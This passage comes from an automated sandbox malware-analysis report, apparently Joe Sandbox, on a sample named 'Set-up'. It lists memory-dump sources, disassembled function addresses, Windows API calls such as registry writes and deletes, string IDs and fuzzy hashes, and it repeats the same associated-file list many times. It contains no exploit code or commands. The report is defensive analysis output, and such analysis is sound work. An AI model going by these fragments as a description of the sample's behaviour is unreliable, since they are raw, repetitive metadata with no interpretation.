                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Concurrency::cancel_current_task
                                                                                                                                  • String ID: (where >= p_) && (where <= p_ + s_)$c_ >= s_$datavect<struct QuantumRegistry::Entry *>::insert$last >= first
                                                                                                                                  • API String ID: 118556049-116943243
                                                                                                                                  • Opcode ID: ee715c34f6afb3ed9142d522790d7293edb325d965cf69028f2034342810bcac
                                                                                                                                  • Instruction ID: def5ce17ec013a1737eeaa50acd32ee77c120576348a35bd08d27e4346902534
                                                                                                                                  • Opcode Fuzzy Hash: ee715c34f6afb3ed9142d522790d7293edb325d965cf69028f2034342810bcac
                                                                                                                                  • Instruction Fuzzy Hash: 4C41D832B002069FCF18CF68D48199DB7F5EBC4314B16C16EE41997641EA70AA42D783
                                                                                                                                  Function 00E6DA70 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 125COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: NumCast$RegOpenKeyExW()$RegOpenKeyTransactedW()$value >= 0
                                                                                                                                  • API String ID: 0-988358046
                                                                                                                                  • Opcode ID: 4dcbaf3671b47b1be6282e8479729a7c4376bb2307d71675ffcf4163272d49d5
                                                                                                                                  • Instruction ID: 99e88f1420b64704499c4e5bc937790529841d1b8a7725af4b94da1741febd56
                                                                                                                                  • Opcode Fuzzy Hash: 4dcbaf3671b47b1be6282e8479729a7c4376bb2307d71675ffcf4163272d49d5
                                                                                                                                  • Instruction Fuzzy Hash: 27416A31B48205ABC724DF24FC45B69BB95FF847A4F04512AE826AB2C5CB71AC15C7C1
                                                                                                                                  Function 00E415B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 124COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetEvent.KERNEL32(?), ref: 00E77C5F
                                                                                                                                  • GetLastError.KERNEL32(00000001), ref: 00E77C97
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E77CC2
                                                                                                                                  • GetFileAttributesW.KERNEL32(00000000,01303710,?), ref: 00E77D41
                                                                                                                                    • Part of subcall function 00E51860: WaitForSingleObject.KERNEL32(?,460C02D8,460C02D8), ref: 00E5188F
                                                                                                                                    • Part of subcall function 00F06D70: EnterCriticalSection.KERNEL32(0000000C,460C02D8,00000000,00E7C2D7), ref: 00F06DAE
                                                                                                                                    • Part of subcall function 00F06D70: LeaveCriticalSection.KERNEL32(0000000C), ref: 00F06DD3
                                                                                                                                    • Part of subcall function 00F06D70: EnterCriticalSection.KERNEL32(0000000C), ref: 00F06DFA
                                                                                                                                    • Part of subcall function 00F06D70: LeaveCriticalSection.KERNEL32(0000000C), ref: 00F06E1C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$EnterLeave$AttributesErrorEventException@8FileLastObjectSingleThrowWait
                                                                                                                                  • String ID: SetEvent()
                                                                                                                                  • API String ID: 901363289-2184393977
                                                                                                                                  • Opcode ID: b4c02c3713953265d83b6898761df089b3e68b895b9cb788bd29956c4b6b8c33
                                                                                                                                  • Instruction ID: bc0e424e3bc7bda91e70a95072fdbf0c7520949d4bf1b721a7b8f759be9ea4b2
                                                                                                                                  • Opcode Fuzzy Hash: b4c02c3713953265d83b6898761df089b3e68b895b9cb788bd29956c4b6b8c33
                                                                                                                                  • Instruction Fuzzy Hash: 0041F471A042099FDB24DFA4DD41BAEBBF4FF05324F10426DE865A72C0EB76A904CB90
                                                                                                                                  Function 00E6B390 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 115fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00E699C0: new.LIBCMT ref: 00E69A39
                                                                                                                                  • CreateFileW.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000080,00000000,00000000,00000000,460C02D8), ref: 00E6B433
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E6B47D
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6B4C1
                                                                                                                                  • GetLastError.KERNEL32(?,01303B34,?,?,CreateFileW()), ref: 00E6B4CB
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$CreateException@8FileThrow
                                                                                                                                  • String ID: CreateFileW()
                                                                                                                                  • API String ID: 2070419038-3282452705
                                                                                                                                  • Opcode ID: 10c9d5e0487b47db72063f3223759db14c467203d43a6391f17dd18b10f0a07e
                                                                                                                                  • Instruction ID: b8976a7547078f7d8567f7d57b977d20a2696a39a692986f893b0fc2a7d965c1
                                                                                                                                  • Opcode Fuzzy Hash: 10c9d5e0487b47db72063f3223759db14c467203d43a6391f17dd18b10f0a07e
                                                                                                                                  • Instruction Fuzzy Hash: A9418C7194124AEFDF14DFA4D849BAEBBF8FF04314F104169E425E7281EB79A948CB90
                                                                                                                                  Function 00E6F780 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 94registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00E6CD00: GetCurrentProcess.KERNEL32(?,00000000,?,00000400), ref: 00E6CE1A
                                                                                                                                  • RegDeleteValueW.ADVAPI32(?,00000000,00000000,00000000,460C02D8,00000002,00000000,00000000,00000000,0131A974,460C02D8,?,00000000), ref: 00E6F83E
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6F893
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentDeleteExceptionException@8ProcessRaiseThrowValue
                                                                                                                                  • String ID: NumCast$RegDeleteValueW()$value >= 0
                                                                                                                                  • API String ID: 1616290930-4130027338
                                                                                                                                  • Opcode ID: 251935ab79e847db1fc99bf966e79d8189c22097af5ea6349748d51242394f25
                                                                                                                                  • Instruction ID: 2471f6f0520323988783643ade6570e89ed00728cf43607ac264916f9b61891c
                                                                                                                                  • Opcode Fuzzy Hash: 251935ab79e847db1fc99bf966e79d8189c22097af5ea6349748d51242394f25
                                                                                                                                  • Instruction Fuzzy Hash: 6D319C70A00249EBDF18DFA4DD05BAEBBF5FF44714F104169E815B7281CBB56A08CB90
                                                                                                                                  Function 00E6F360 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 86registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RegSetValueExW.ADVAPI32(00000000,00000000,00000000,?,00000004,00000004,00000004,00000000), ref: 00E6F401
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6F459
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionException@8RaiseThrowValue
                                                                                                                                  • String ID: NumCast$RegSetValueExW()$value >= 0
                                                                                                                                  • API String ID: 546801787-3683907876
                                                                                                                                  • Opcode ID: f74819cb782ae7480e7225e33c0f4e4db9606474e6015200b866e9fff43bc901
                                                                                                                                  • Instruction ID: 37c2ff41ebd168b3f70fcaaf7d2913c902d3def3d606c56c00903763f23a2677
                                                                                                                                  • Opcode Fuzzy Hash: f74819cb782ae7480e7225e33c0f4e4db9606474e6015200b866e9fff43bc901
                                                                                                                                  • Instruction Fuzzy Hash: 85318970A00209AFDB14DF64D855BEEBBF5FF48754F104169E825B7281DB7AAA08CB90
                                                                                                                                  Function 00E5A4D0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00E5A450: LocalFree.KERNEL32 ref: 00E5A45A
                                                                                                                                  • LocalAlloc.KERNEL32(00000000,00000008), ref: 00E5A4F3
                                                                                                                                  • GetLastError.KERNEL32(00000001), ref: 00E5A536
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E5A55F
                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00E5A57F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Local$AllocErrorException@8FreeLastLengthThrow
                                                                                                                                  • String ID: LocalAlloc()
                                                                                                                                  • API String ID: 4043245386-2360299210
                                                                                                                                  • Opcode ID: 97732b8962d2259e58f25e26371a17662f18aa3bc4ed6b95e4ff3eb5e71b869d
                                                                                                                                  • Instruction ID: 2a087e113eb04324d929ca009855bd7ea3289f607acaac593ad0522798c23e8b
                                                                                                                                  • Opcode Fuzzy Hash: 97732b8962d2259e58f25e26371a17662f18aa3bc4ed6b95e4ff3eb5e71b869d
                                                                                                                                  • Instruction Fuzzy Hash: 33F0A4755003056BCB387AB99C0AF5A3EADAB40715F040934FD15A72C5EEB0E848C7A6
                                                                                                                                  Function 0102C6E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(0131BE48,460C02D8), ref: 0102C716
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0102C727
                                                                                                                                  • new.LIBCMT ref: 0102C744
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131BE48), ref: 0102C79D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$CurrentEnterLeaveThread
                                                                                                                                  • String ID: n
                                                                                                                                  • API String ID: 2351996187-3297054318
                                                                                                                                  • Opcode ID: 60a2372b5d7f11be853c062e217cbbaecc533c67fc5690a9b6bdd15cc8abc22d
                                                                                                                                  • Instruction ID: fc363d93c404c0120e4c31e5afad70030cc05d18b4cfa9ff4fecf7f4a4de2f4a
                                                                                                                                  • Opcode Fuzzy Hash: 60a2372b5d7f11be853c062e217cbbaecc533c67fc5690a9b6bdd15cc8abc22d
                                                                                                                                  • Instruction Fuzzy Hash: E2112670C09288DFDB15CB68D50979DBBF8EF06308F0002DAD454A7386C3B51A04CBA2
                                                                                                                                  Function 01124D08 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,01124CB9,?,?,01124C59,?,012FF4D8,0000000C,01124DB0,?,00000002), ref: 01124D28
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 01124D3B
                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,01124CB9,?,?,01124C59,?,012FF4D8,0000000C,01124DB0,?,00000002,00000000), ref: 01124D5E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
